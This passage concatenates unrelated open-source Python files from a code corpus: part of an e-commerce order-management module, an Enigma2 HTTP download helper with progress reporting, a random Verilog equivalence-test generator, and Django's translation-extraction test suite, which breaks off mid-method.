'MAIL_RECEIVE_TIME/MAIL_DOWNLOAD_TIME/MAIL_FORWARDED_BY/MAIL_FORWARD_TIME/MAIL_FORWARD_COMMENT'
values = rec
this_buyer = rec[9]
if not this_buyer or this_buyer in existed:
continue
else:
existed.append(this_buyer)
ss.set_items(keys, values)
yield ss
class ContactBuyerFinder(Finder):
def find_buyers(self):
L=[]
rows=self.rows
for row in rows:
cell=row['cell']
buyer=cell[10]
L.append(buyer)
return L
def generator(self):
L=[]
for rec in Finder(self.J):
ss = Struct()
keys = 'order/ph/ph/ph/ph/responder/assign_time/order_error_text/buyer_message/comment_area/paypal_code/buyer/add_email/'\
'add_receiver/CN_dest/warehouse/shipping_method/online_shipping_method/store_name/order_status/import_time'
values = rec
ss.set_items(keys, values)
yield ss
class TemplatesFinder(Finder):
def html_filter(self, html):
if not html:
return ''
html = html.replace('<br />', '\n')
return html
class X(Struct):
"""Full Order Container"""
@property
def middle_time(self):
history = self.history
if not history:
return '[History Not Enabled]'
for x in history:
who = x['UserId']
what = x['OperateName']
text = x['OperateLog']
status_name = x['StateName']
time = x['OperateDate']
orderID = x['OrderId']
if u'已交寄' in status_name:
return time
return '[Mid-time Not Found]'
@property
def isSentLess(self):
def f(x):
return x.isdigit() or x == '.'
if not self.actual_weight:
return u'Actual Weight Unknown'
if not self.should_weight:
return u'Should Weight Unknown'
actual_float = float(filter(f, self.get_actual_weight))
should_float = float(filter(f, self.get_should_weight))
difference = actual_float - should_float
isless = actual_float < should_float
percent = (difference) / should_float
if isless:
return str(percent * 100)
else:
return 'ok'
def HasItem(self, itemID):
for each in self.details:
if itemID == each.ItemID:
return True
return False
@property
def status(self):
return self.order_status
@property
def isFinished(self):
        return self.status not in u'待检查/未确认/已拦截/联系客户'
@property
def isOngoing(self):
return not self.isFinished
@property
def isInterceptable(self):
return self.status in u'处理中'
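The `Struct` helper above is an attribute bag driven by `/`-separated key strings. A minimal, self-contained sketch of the same pattern in Python 3 (the name `AttrDict` is illustrative, not from the original module; `zip` truncation here replaces the original's placeholder-padding loop):

```python
class AttrDict:
    """Attribute bag: keyword arguments become instance attributes."""

    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)

    def __getitem__(self, key):
        return self.__dict__[key]

    def get_items(self, keys):
        # 'a/b' -> [self.a, self.b]
        return [self.__dict__[k] for k in keys.split('/')]

    def set_items(self, keys, values):
        # zip() stops at the shorter sequence, so mismatched lengths
        # are silently truncated instead of padded with placeholders.
        self.__dict__.update(zip(keys.split('/'), values))


ss = AttrDict(a=1, b='b')
ss.set_items('x/y', [10, 20])
```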
|
openhdf/enigma2-wetek | refs/heads/master | lib/python/Tools/Downloader.py | 5 | from boxbranding import getMachineBrand, getMachineName
from twisted.web import client
from twisted.internet import reactor, defer, ssl
class HTTPProgressDownloader(client.HTTPDownloader):
def __init__(self, url, outfile, headers=None):
client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent="Enigma2 HbbTV/1.1.1 (+PVR+RTSP+DL;OpenATV;;;)")
self.status = None
self.progress_callback = None
self.deferred = defer.Deferred()
def noPage(self, reason):
if self.status == "304":
print reason.getErrorMessage()
client.HTTPDownloader.page(self, "")
else:
client.HTTPDownloader.noPage(self, reason)
def gotHeaders(self, headers):
if self.status == "200":
if headers.has_key("content-length"):
self.totalbytes = int(headers["content-length"][0])
else:
self.totalbytes = 0
self.currentbytes = 0.0
return client.HTTPDownloader.gotHeaders(self, headers)
def pagePart(self, packet):
if self.status == "200":
self.currentbytes += len(packet)
if self.totalbytes and self.progress_callback:
self.progress_callback(self.currentbytes, self.totalbytes)
return client.HTTPDownloader.pagePart(self, packet)
def pageEnd(self):
return client.HTTPDownloader.pageEnd(self)
class downloadWithProgress:
def __init__(self, url, outputfile, contextFactory=None, *args, **kwargs):
if hasattr(client, '_parse'):
scheme, host, port, path = client._parse(url)
else:
from twisted.web.client import _URI
uri = _URI.fromBytes(url)
scheme = uri.scheme
host = uri.host
port = uri.port
path = uri.path
self.factory = HTTPProgressDownloader(url, outputfile, *args, **kwargs)
if scheme == "https":
self.connection = reactor.connectSSL(host, port, self.factory, ssl.ClientContextFactory())
else:
self.connection = reactor.connectTCP(host, port, self.factory)
def start(self):
return self.factory.deferred
def stop(self):
if self.connection:
print "[stop]"
self.connection.disconnect()
def addProgress(self, progress_callback):
print "[addProgress]"
self.factory.progress_callback = progress_callback
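`pagePart` above hands `(currentbytes, totalbytes)` to `progress_callback`. A small helper for turning that pair into a percentage (the name `percent_done` is illustrative; the guard covers the `totalbytes == 0` case the downloader allows for responses without a Content-Length header):

```python
def percent_done(current_bytes, total_bytes):
    # total_bytes is 0 when the response carried no Content-Length
    # header, so the percentage is undefined in that case.
    if not total_bytes:
        return None
    return 100.0 * current_bytes / total_bytes
```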
|
cseed/arachne-pnr | refs/heads/master | tests/combinatorial/generate.py | 2 | #!/usr/bin/python
from __future__ import division
from __future__ import print_function
import sys
import random
from contextlib import contextmanager
random.seed(1)
@contextmanager
def redirect_stdout(new_target):
old_target, sys.stdout = sys.stdout, new_target
try:
yield new_target
finally:
sys.stdout = old_target
def random_term(variables):
n_inputs = random.randint(4, 9)
inputs = [random.choice(variables) for i in range(0, n_inputs)]
n_terms = random.randint(3, 5)
term = ' | '.join([
('('
+ ' & '.join([
random.choice([v, '~' + v])
for v in inputs])
+ ')')
for i in range(0, n_terms)])
return term
for idx in range(25):
with open('temp/uut_%05d.v' % idx, 'w') as f:
with redirect_stdout(f):
pins = 96
            n_inputs = random.randint(3, pins // 2)
            n_outputs = random.randint(3, pins // 2)
print('module uut_%05d(' % (idx), end="")
variables = ['i0']
print('input i0', end='')
for i in range(1, n_inputs+1):
v = 'i%d' % (i)
print(', input %s' % (v), end='')
variables.append(v)
for i in range(0, n_outputs+1):
print(', output o%d' % (i), end='')
print(');')
n_temps = random.randint(3,50)
for i in range(0, n_temps):
p = random.random()
if p < 0.05:
width = random.randint(3, 16)
a = ('{'
+ ', '.join([random.choice(variables) for j in range(0, width)])
+ '}')
b = ('{'
+ ', '.join([random.choice(variables) for j in range(0, width)])
+ '}')
op = random.choice(['+', '-'])
print(' wire [%d:0] t%d = %s %s %s;'
% (width - 1, i, a, op, b))
for j in range(0, width):
variables.append('t%d[%d]' % (i, j))
elif p < 0.1:
width = random.randint(3, 16)
a = ('{'
+ ', '.join([random.choice(variables) for j in range(0, width)])
+ '}')
b = ('{'
+ ', '.join([random.choice(variables) for j in range(0, width)])
+ '}')
op = random.choice(['<', '<=', '>', '>=', '==', '!='])
print(' wire t%d = %s %s %s;'
% (i, a, op, b))
variables.append('t%d' % (i))
else:
term = random_term(variables)
print(' wire t%d = %s;' % (i, term))
variables.append('t%d' % (i))
for i in range(0, n_outputs+1):
term = random_term(variables)
print(' assign o%d = %s;' % (i, term))
print('endmodule')
with open('temp/uut_%05d.ys' % idx, 'w') as f:
with redirect_stdout(f):
print('rename uut_%05d gate' % idx)
print('read_verilog temp/uut_%05d.v' % idx)
print('rename uut_%05d gold' % idx)
print('hierarchy; proc;;')
print('miter -equiv -flatten -ignore_gold_x -make_outputs -make_outcmp gold gate miter')
print('sat -verify-no-timeout -timeout 20 -prove trigger 0 -show-inputs -show-outputs miter')
with open('temp/uut_%05d_pp.ys' % idx, 'w') as f:
with redirect_stdout(f):
print('rename uut_%05d gate' % idx)
print('read_verilog temp/uut_%05d.v' % idx)
print('rename uut_%05d gold' % idx)
print('hierarchy; proc;;')
print('techmap -map +/adff2dff.v; opt;;')
print('miter -equiv -flatten -ignore_gold_x -make_outputs -make_outcmp gold gate miter')
print('sat -verify-no-timeout -timeout 20 -prove trigger 0 -show-inputs -show-outputs miter')
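`random_term` above emits a random sum-of-products expression over the accumulated variables. A standalone sketch of the same shape (the name `random_sop` and the explicit `random.Random` instance are illustrative, not part of the generator script):

```python
import random


def random_sop(variables, rng):
    # Sum-of-products: OR of a few AND-terms over randomly chosen,
    # possibly negated variables.
    inputs = [rng.choice(variables) for _ in range(rng.randint(4, 9))]
    terms = []
    for _ in range(rng.randint(3, 5)):
        literals = [rng.choice([v, '~' + v]) for v in inputs]
        terms.append('(' + ' & '.join(literals) + ')')
    return ' | '.join(terms)


rng = random.Random(1)  # seeded for reproducibility, like the script
expr = random_sop(['i0', 'i1', 'i2'], rng)
```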
|
kamyu104/django | refs/heads/master | tests/i18n/test_extraction.py | 89 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import io
import os
import re
import shutil
import time
import warnings
from unittest import SkipTest, skipUnless
from django.conf import settings
from django.core import management
from django.core.management import execute_from_command_line
from django.core.management.base import CommandError
from django.core.management.commands.makemessages import \
Command as MakeMessagesCommand
from django.core.management.utils import find_command
from django.test import SimpleTestCase, mock, override_settings
from django.test.testcases import SerializeMixin
from django.test.utils import captured_stderr, captured_stdout
from django.utils import six
from django.utils._os import upath
from django.utils.encoding import force_text
from django.utils.six import StringIO
from django.utils.translation import TranslatorCommentWarning
LOCALE = 'de'
has_xgettext = find_command('xgettext')
this_directory = os.path.dirname(upath(__file__))
@skipUnless(has_xgettext, 'xgettext is mandatory for extraction tests')
class ExtractorTests(SerializeMixin, SimpleTestCase):
# makemessages scans the current working directory and writes in the
# locale subdirectory. There aren't any options to control this. As a
# consequence tests can't run in parallel. Since i18n tests run in less
# than 4 seconds, serializing them with SerializeMixin is acceptable.
lockfile = __file__
test_dir = os.path.abspath(os.path.join(this_directory, 'commands'))
PO_FILE = 'locale/%s/LC_MESSAGES/django.po' % LOCALE
def setUp(self):
self._cwd = os.getcwd()
def _rmrf(self, dname):
if os.path.commonprefix([self.test_dir, os.path.abspath(dname)]) != self.test_dir:
return
shutil.rmtree(dname)
def rmfile(self, filepath):
if os.path.exists(filepath):
os.remove(filepath)
def tearDown(self):
os.chdir(self.test_dir)
try:
self._rmrf('locale/%s' % LOCALE)
except OSError:
pass
os.chdir(self._cwd)
def _run_makemessages(self, **options):
os.chdir(self.test_dir)
out = StringIO()
management.call_command('makemessages', locale=[LOCALE], verbosity=2,
stdout=out, **options)
output = out.getvalue()
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = fp.read()
return output, po_contents
def _assertPoKeyword(self, keyword, expected_value, haystack, use_quotes=True):
q = '"'
if use_quotes:
expected_value = '"%s"' % expected_value
q = "'"
needle = '%s %s' % (keyword, expected_value)
expected_value = re.escape(expected_value)
return self.assertTrue(re.search('^%s %s' % (keyword, expected_value), haystack, re.MULTILINE),
'Could not find %(q)s%(n)s%(q)s in generated PO file' % {'n': needle, 'q': q})
def assertMsgId(self, msgid, haystack, use_quotes=True):
return self._assertPoKeyword('msgid', msgid, haystack, use_quotes=use_quotes)
def assertMsgIdPlural(self, msgid, haystack, use_quotes=True):
return self._assertPoKeyword('msgid_plural', msgid, haystack, use_quotes=use_quotes)
def assertMsgStr(self, msgstr, haystack, use_quotes=True):
return self._assertPoKeyword('msgstr', msgstr, haystack, use_quotes=use_quotes)
def assertNotMsgId(self, msgid, s, use_quotes=True):
if use_quotes:
msgid = '"%s"' % msgid
msgid = re.escape(msgid)
return self.assertTrue(not re.search('^msgid %s' % msgid, s, re.MULTILINE))
def _assertPoLocComment(self, assert_presence, po_filename, line_number, *comment_parts):
with open(po_filename, 'r') as fp:
po_contents = force_text(fp.read())
if os.name == 'nt':
# #: .\path\to\file.html:123
cwd_prefix = '%s%s' % (os.curdir, os.sep)
else:
# #: path/to/file.html:123
cwd_prefix = ''
parts = ['#: ']
path = os.path.join(cwd_prefix, *comment_parts)
parts.append(path)
if isinstance(line_number, six.string_types):
line_number = self._get_token_line_number(path, line_number)
if line_number is not None:
parts.append(':%d' % line_number)
needle = ''.join(parts)
if assert_presence:
return self.assertIn(needle, po_contents, '"%s" not found in final .po file.' % needle)
else:
return self.assertNotIn(needle, po_contents, '"%s" shouldn\'t be in final .po file.' % needle)
def _get_token_line_number(self, path, token):
with open(path) as f:
for line, content in enumerate(f, 1):
if token in force_text(content):
return line
self.fail("The token '%s' could not be found in %s, please check the test config" % (token, path))
def assertLocationCommentPresent(self, po_filename, line_number, *comment_parts):
"""
self.assertLocationCommentPresent('django.po', 42, 'dirA', 'dirB', 'foo.py')
verifies that the django.po file has a gettext-style location comment of the form
`#: dirA/dirB/foo.py:42`
(or `#: .\dirA\dirB\foo.py:42` on Windows)
None can be passed for the line_number argument to skip checking of
the :42 suffix part.
        A string token can also be passed as line_number, in which case it
will be searched in the template, and its line number will be used.
A msgid is a suitable candidate.
"""
return self._assertPoLocComment(True, po_filename, line_number, *comment_parts)
def assertLocationCommentNotPresent(self, po_filename, line_number, *comment_parts):
"""Check the opposite of assertLocationComment()"""
return self._assertPoLocComment(False, po_filename, line_number, *comment_parts)
def assertRecentlyModified(self, path):
"""
Assert that file was recently modified (modification time was less than 10 seconds ago).
"""
delta = time.time() - os.stat(path).st_mtime
        self.assertLess(delta, 10, "%s wasn't recently modified" % path)
def assertNotRecentlyModified(self, path):
"""
Assert that file was not recently modified (modification time was more than 10 seconds ago).
"""
delta = time.time() - os.stat(path).st_mtime
        self.assertGreater(delta, 10, "%s was recently modified" % path)
class BasicExtractorTests(ExtractorTests):
def test_comments_extractor(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with io.open(self.PO_FILE, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
self.assertNotIn('This comment should not be extracted', po_contents)
# Comments in templates
self.assertIn('#. Translators: This comment should be extracted', po_contents)
self.assertIn(
"#. Translators: Django comment block for translators\n#. "
"string's meaning unveiled",
po_contents
)
self.assertIn('#. Translators: One-line translator comment #1', po_contents)
self.assertIn('#. Translators: Two-line translator comment #1\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #2', po_contents)
self.assertIn('#. Translators: Two-line translator comment #2\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #3', po_contents)
self.assertIn('#. Translators: Two-line translator comment #3\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #4', po_contents)
self.assertIn('#. Translators: Two-line translator comment #4\n#. continued here.', po_contents)
self.assertIn(
'#. Translators: One-line translator comment #5 -- with '
'non ASCII characters: áéíóúö',
po_contents
)
self.assertIn(
'#. Translators: Two-line translator comment #5 -- with '
'non ASCII characters: áéíóúö\n#. continued here.',
po_contents
)
def test_blocktrans_trimmed(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# should not be trimmed
self.assertNotMsgId('Text with a few line breaks.', po_contents)
# should be trimmed
self.assertMsgId("Again some text with a few line breaks, this time should be trimmed.", po_contents)
# #21406 -- Should adjust for eaten line numbers
self.assertMsgId("Get my line number", po_contents)
self.assertLocationCommentPresent(self.PO_FILE, 'Get my line number', 'templates', 'test.html')
def test_force_en_us_locale(self):
"""Value of locale-munging option used by the command is the right one"""
self.assertTrue(MakeMessagesCommand.leave_locale_alone)
def test_extraction_error(self):
os.chdir(self.test_dir)
msg = (
'Translation blocks must not include other block tags: blocktrans '
'(file %s, line 3)' % os.path.join('templates', 'template_with_error.tpl')
)
with self.assertRaisesMessage(SyntaxError, msg):
management.call_command('makemessages', locale=[LOCALE], extensions=['tpl'], verbosity=0)
# Check that the temporary file was cleaned up
self.assertFalse(os.path.exists('./templates/template_with_error.tpl.py'))
def test_unicode_decode_error(self):
os.chdir(self.test_dir)
shutil.copyfile('./not_utf8.sample', './not_utf8.txt')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'not_utf8.txt'))
out = StringIO()
management.call_command('makemessages', locale=[LOCALE], stdout=out)
self.assertIn("UnicodeDecodeError: skipped file not_utf8.txt in .",
force_text(out.getvalue()))
def test_extraction_warning(self):
"""test xgettext warning about multiple bare interpolation placeholders"""
os.chdir(self.test_dir)
shutil.copyfile('./code.sample', './code_sample.py')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'code_sample.py'))
out = StringIO()
management.call_command('makemessages', locale=[LOCALE], stdout=out)
self.assertIn("code_sample.py:4", force_text(out.getvalue()))
def test_template_message_context_extractor(self):
"""
Ensure that message contexts are correctly extracted for the
{% trans %} and {% blocktrans %} template tags.
Refs #14806.
"""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertIn('msgctxt "Special trans context #1"', po_contents)
self.assertMsgId("Translatable literal #7a", po_contents)
self.assertIn('msgctxt "Special trans context #2"', po_contents)
self.assertMsgId("Translatable literal #7b", po_contents)
self.assertIn('msgctxt "Special trans context #3"', po_contents)
self.assertMsgId("Translatable literal #7c", po_contents)
# {% trans %} with a filter
for minor_part in 'abcdefgh': # Iterate from #7.1a to #7.1h template markers
self.assertIn('msgctxt "context #7.1{}"'.format(minor_part), po_contents)
self.assertMsgId('Translatable literal #7.1{}'.format(minor_part), po_contents)
# {% blocktrans %}
self.assertIn('msgctxt "Special blocktrans context #1"', po_contents)
self.assertMsgId("Translatable literal #8a", po_contents)
self.assertIn('msgctxt "Special blocktrans context #2"', po_contents)
self.assertMsgId("Translatable literal #8b-singular", po_contents)
self.assertIn("Translatable literal #8b-plural", po_contents)
self.assertIn('msgctxt "Special blocktrans context #3"', po_contents)
self.assertMsgId("Translatable literal #8c-singular", po_contents)
self.assertIn("Translatable literal #8c-plural", po_contents)
self.assertIn('msgctxt "Special blocktrans context #4"', po_contents)
self.assertMsgId("Translatable literal #8d %(a)s", po_contents)
def test_context_in_single_quotes(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertIn('msgctxt "Context wrapped in double quotes"', po_contents)
self.assertIn('msgctxt "Context wrapped in single quotes"', po_contents)
# {% blocktrans %}
self.assertIn('msgctxt "Special blocktrans context wrapped in double quotes"', po_contents)
self.assertIn('msgctxt "Special blocktrans context wrapped in single quotes"', po_contents)
def test_template_comments(self):
"""Template comment tags on the same line of other constructs (#19552)"""
os.chdir(self.test_dir)
# Test detection/end user reporting of old, incorrect templates
# translator comments syntax
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter('always')
management.call_command('makemessages', locale=[LOCALE], extensions=['thtml'], verbosity=0)
self.assertEqual(len(ws), 3)
for w in ws:
self.assertTrue(issubclass(w.category, TranslatorCommentWarning))
six.assertRegex(
self, str(ws[0].message),
r"The translator-targeted comment 'Translators: ignored i18n "
r"comment #1' \(file templates[/\\]comments.thtml, line 4\) "
r"was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(
self, str(ws[1].message),
r"The translator-targeted comment 'Translators: ignored i18n "
r"comment #3' \(file templates[/\\]comments.thtml, line 6\) "
r"was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(
self, str(ws[2].message),
r"The translator-targeted comment 'Translators: ignored i18n "
r"comment #4' \(file templates[/\\]comments.thtml, line 8\) "
                r"was ignored, because it wasn't the last item on the line\."
)
# Now test .po file contents
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('Translatable literal #9a', po_contents)
self.assertNotIn('ignored comment #1', po_contents)
self.assertNotIn('Translators: ignored i18n comment #1', po_contents)
self.assertMsgId("Translatable literal #9b", po_contents)
self.assertNotIn('ignored i18n comment #2', po_contents)
self.assertNotIn('ignored comment #2', po_contents)
self.assertMsgId('Translatable literal #9c', po_contents)
self.assertNotIn('ignored comment #3', po_contents)
self.assertNotIn('ignored i18n comment #3', po_contents)
self.assertMsgId('Translatable literal #9d', po_contents)
self.assertNotIn('ignored comment #4', po_contents)
self.assertMsgId('Translatable literal #9e', po_contents)
self.assertNotIn('ignored comment #5', po_contents)
self.assertNotIn('ignored i18n comment #4', po_contents)
self.assertMsgId('Translatable literal #9f', po_contents)
self.assertIn('#. Translators: valid i18n comment #5', po_contents)
self.assertMsgId('Translatable literal #9g', po_contents)
self.assertIn('#. Translators: valid i18n comment #6', po_contents)
self.assertMsgId('Translatable literal #9h', po_contents)
self.assertIn('#. Translators: valid i18n comment #7', po_contents)
self.assertMsgId('Translatable literal #9i', po_contents)
six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #8')
six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #9')
self.assertMsgId("Translatable literal #9j", po_contents)
def test_makemessages_find_files(self):
"""
Test that find_files only discovers files having the proper extensions.
"""
cmd = MakeMessagesCommand()
cmd.ignore_patterns = ['CVS', '.*', '*~', '*.pyc']
cmd.symlinks = False
cmd.domain = 'django'
cmd.extensions = ['html', 'txt', 'py']
cmd.verbosity = 0
cmd.locale_paths = []
cmd.default_locale_path = os.path.join(self.test_dir, 'locale')
found_files = cmd.find_files(self.test_dir)
found_exts = set([os.path.splitext(tfile.file)[1] for tfile in found_files])
self.assertEqual(found_exts.difference({'.py', '.html', '.txt'}), set())
cmd.extensions = ['js']
cmd.domain = 'djangojs'
found_files = cmd.find_files(self.test_dir)
found_exts = set([os.path.splitext(tfile.file)[1] for tfile in found_files])
self.assertEqual(found_exts.difference({'.js'}), set())
@mock.patch('django.core.management.commands.makemessages.popen_wrapper')
def test_makemessages_gettext_version(self, mocked_popen_wrapper):
# "Normal" output:
mocked_popen_wrapper.return_value = (
"xgettext (GNU gettext-tools) 0.18.1\n"
"Copyright (C) 1995-1998, 2000-2010 Free Software Foundation, Inc.\n"
"License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n"
"This is free software: you are free to change and redistribute it.\n"
"There is NO WARRANTY, to the extent permitted by law.\n"
"Written by Ulrich Drepper.\n", '', 0)
cmd = MakeMessagesCommand()
self.assertEqual(cmd.gettext_version, (0, 18, 1))
# Version number with only 2 parts (#23788)
mocked_popen_wrapper.return_value = (
"xgettext (GNU gettext-tools) 0.17\n", '', 0)
cmd = MakeMessagesCommand()
self.assertEqual(cmd.gettext_version, (0, 17))
# Bad version output
mocked_popen_wrapper.return_value = (
"any other return value\n", '', 0)
cmd = MakeMessagesCommand()
with six.assertRaisesRegex(self, CommandError, "Unable to get gettext version. Is it installed?"):
cmd.gettext_version
def test_po_file_encoding_when_updating(self):
"""Update of PO file doesn't corrupt it with non-UTF-8 encoding on Python3+Windows (#23271)"""
BR_PO_BASE = 'locale/pt_BR/LC_MESSAGES/django'
os.chdir(self.test_dir)
shutil.copyfile(BR_PO_BASE + '.pristine', BR_PO_BASE + '.po')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'locale', 'pt_BR', 'LC_MESSAGES', 'django.po'))
management.call_command('makemessages', locale=['pt_BR'], verbosity=0)
self.assertTrue(os.path.exists(BR_PO_BASE + '.po'))
with io.open(BR_PO_BASE + '.po', 'r', encoding='utf-8') as fp:
po_contents = force_text(fp.read())
self.assertMsgStr("Größe", po_contents)
class JavascriptExtractorTests(ExtractorTests):
PO_FILE = 'locale/%s/LC_MESSAGES/djangojs.po' % LOCALE
def test_javascript_literals(self):
os.chdir(self.test_dir)
_, po_contents = self._run_makemessages(domain='djangojs')
self.assertMsgId('This literal should be included.', po_contents)
self.assertMsgId('gettext_noop should, too.', po_contents)
self.assertMsgId('This one as well.', po_contents)
self.assertMsgId(r'He said, \"hello\".', po_contents)
self.assertMsgId("okkkk", po_contents)
self.assertMsgId("TEXT", po_contents)
self.assertMsgId("It's at http://example.com", po_contents)
self.assertMsgId("String", po_contents)
self.assertMsgId("/* but this one will be too */ 'cause there is no way of telling...", po_contents)
self.assertMsgId("foo", po_contents)
self.assertMsgId("bar", po_contents)
self.assertMsgId("baz", po_contents)
self.assertMsgId("quz", po_contents)
self.assertMsgId("foobar", po_contents)
@override_settings(
STATIC_ROOT=os.path.join(this_directory, 'commands', 'static/'),
MEDIA_ROOT=os.path.join(this_directory, 'commands', 'media_root/'))
def test_media_static_dirs_ignored(self):
"""
Regression test for #23583.
"""
_, po_contents = self._run_makemessages(domain='djangojs')
self.assertMsgId("Static content inside app should be included.", po_contents)
self.assertNotMsgId("Content from STATIC_ROOT should not be included", po_contents)
@override_settings(STATIC_ROOT=None, MEDIA_ROOT='')
def test_default_root_settings(self):
"""
Regression test for #23717.
"""
_, po_contents = self._run_makemessages(domain='djangojs')
self.assertMsgId("Static content inside app should be included.", po_contents)
class IgnoredExtractorTests(ExtractorTests):
def test_ignore_directory(self):
out, po_contents = self._run_makemessages(ignore_patterns=[
os.path.join('ignore_dir', '*'),
])
self.assertIn("ignoring directory ignore_dir", out)
self.assertMsgId('This literal should be included.', po_contents)
self.assertNotMsgId('This should be ignored.', po_contents)
def test_ignore_subdirectory(self):
out, po_contents = self._run_makemessages(ignore_patterns=[
'templates/*/ignore.html',
'templates/subdir/*',
])
self.assertIn("ignoring directory subdir", out)
self.assertNotMsgId('This subdir should be ignored too.', po_contents)
def test_ignore_file_patterns(self):
out, po_contents = self._run_makemessages(ignore_patterns=[
'xxx_*',
])
self.assertIn("ignoring file xxx_ignored.html", out)
self.assertNotMsgId('This should be ignored too.', po_contents)
@override_settings(
STATIC_ROOT=os.path.join(this_directory, 'commands', 'static/'),
MEDIA_ROOT=os.path.join(this_directory, 'commands', 'media_root/'))
def test_media_static_dirs_ignored(self):
out, _ = self._run_makemessages()
self.assertIn("ignoring directory static", out)
self.assertIn("ignoring directory media_root", out)
class SymlinkExtractorTests(ExtractorTests):
def setUp(self):
super(SymlinkExtractorTests, self).setUp()
self.symlinked_dir = os.path.join(self.test_dir, 'templates_symlinked')
def tearDown(self):
super(SymlinkExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.remove(self.symlinked_dir)
except OSError:
pass
os.chdir(self._cwd)
def test_symlink(self):
# On Python < 3.2 os.symlink() exists only on Unix
if hasattr(os, 'symlink'):
if os.path.exists(self.symlinked_dir):
self.assertTrue(os.path.islink(self.symlinked_dir))
else:
# On Python >= 3.2, os.symlink() always exists but can
# fail at runtime when the user doesn't have the needed
# permissions on Windows versions that support symbolic
# links (>= 6/Vista). See Python issue 9333
# (http://bugs.python.org/issue9333). Skip the test in that case.
try:
os.symlink(os.path.join(self.test_dir, 'templates'), self.symlinked_dir)
except (OSError, NotImplementedError):
raise SkipTest("os.symlink() is available on this OS but can't be used by this user.")
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, symlinks=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This literal should be included.', po_contents)
self.assertIn('templates_symlinked/test.html', po_contents)
class CopyPluralFormsExtractorTests(ExtractorTests):
PO_FILE_ES = 'locale/es/LC_MESSAGES/django.po'
def tearDown(self):
super(CopyPluralFormsExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
self._rmrf('locale/es')
except OSError:
pass
os.chdir(self._cwd)
def test_copy_plural_forms(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertIn('Plural-Forms: nplurals=2; plural=(n != 1)', po_contents)
def test_override_plural_forms(self):
"""Ticket #20311."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=['es'], extensions=['djtpl'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_ES))
with io.open(self.PO_FILE_ES, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
found = re.findall(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', po_contents, re.MULTILINE | re.DOTALL)
self.assertEqual(1, len(found))
def test_trans_and_plural_blocktrans_collision(self):
"""
Ensures a correct workaround for the gettext bug when handling a literal
found inside a {% trans %} tag and also in another file inside a
{% blocktrans %} with a plural (#17375).
"""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], extensions=['html', 'djtpl'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertNotIn("#-#-#-#-# django.pot (PACKAGE VERSION) #-#-#-#-#\\n", po_contents)
self.assertMsgId('First `trans`, then `blocktrans` with a plural', po_contents)
self.assertMsgIdPlural('Plural for a `trans` and `blocktrans` collision case', po_contents)
class NoWrapExtractorTests(ExtractorTests):
def test_no_wrap_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_wrap=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId(
'This literal should also be included wrapped or not wrapped '
'depending on the use of the --no-wrap option.',
po_contents
)
def test_no_wrap_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_wrap=False)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId(
'""\n"This literal should also be included wrapped or not '
'wrapped depending on the "\n"use of the --no-wrap option."',
po_contents,
use_quotes=False
)
class LocationCommentsTests(ExtractorTests):
def test_no_location_enabled(self):
"""Behavior is correct if --no-location switch is specified. See #16903."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_location=True)
self.assertTrue(os.path.exists(self.PO_FILE))
self.assertLocationCommentNotPresent(self.PO_FILE, 55, 'templates', 'test.html.py')
def test_no_location_disabled(self):
